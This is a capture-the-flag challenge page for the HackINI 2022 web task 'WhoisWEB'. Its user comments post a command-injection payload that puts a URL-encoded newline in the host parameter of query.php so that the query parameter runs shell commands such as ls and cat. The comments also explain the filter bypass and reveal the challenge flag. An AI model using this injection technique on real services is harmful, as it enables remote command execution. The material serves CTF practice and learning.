WhoisWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 1158
提  示: There was a problem with the first version, this is the fixed version.
描  述:
A web-based Whois service
评论
Tao23 1年前

query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

to5ny 1年前

/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1

xzs297995 1年前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 2

xiaoxiao972521 2年前

/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

.⎛⎝•̀ω•́⎠⎞. 2年前

1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕

回复 3

unknown237819 2年前

在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令

回复 2

868954104 2年前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1

vchopin 2年前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 0

yituoshi 2年前

Half the truth is often a big lie: thisistheflagwithrandomstuffthatyouwontguessJUSTCATSHE

回复 0

1959272171 2年前

空格被过滤了 用%20绕过

回复 0

WriteUp

image
hopeinhand

1 金币

评分(2)

解题动态

opkjojo 攻破了该题 7小时前
xingzou 攻破了该题 13小时前
wujita01 攻破了该题 13小时前
jhijlkl 攻破了该题 15小时前
pigpigG6768 攻破了该题 1天前
edadsadw 攻破了该题 3天前
Tychema 攻破了该题 4天前
旺仔小滑头 攻破了该题 4天前
网兔010 攻破了该题 5天前
avaclaire 攻破了该题 6天前
kailiyizhong 攻破了该题 6天前
sakuye 攻破了该题 7天前
Radsint 攻破了该题 7天前
一新 攻破了该题 7天前
anton_小金鱼 攻破了该题 7天前
abc123. 攻破了该题 8天前
Seiam 攻破了该题 8天前
马猴烧酒吼姆拉 攻破了该题 8天前
asfwefcwded 攻破了该题 8天前
未眠 攻破了该题 9天前
问题反馈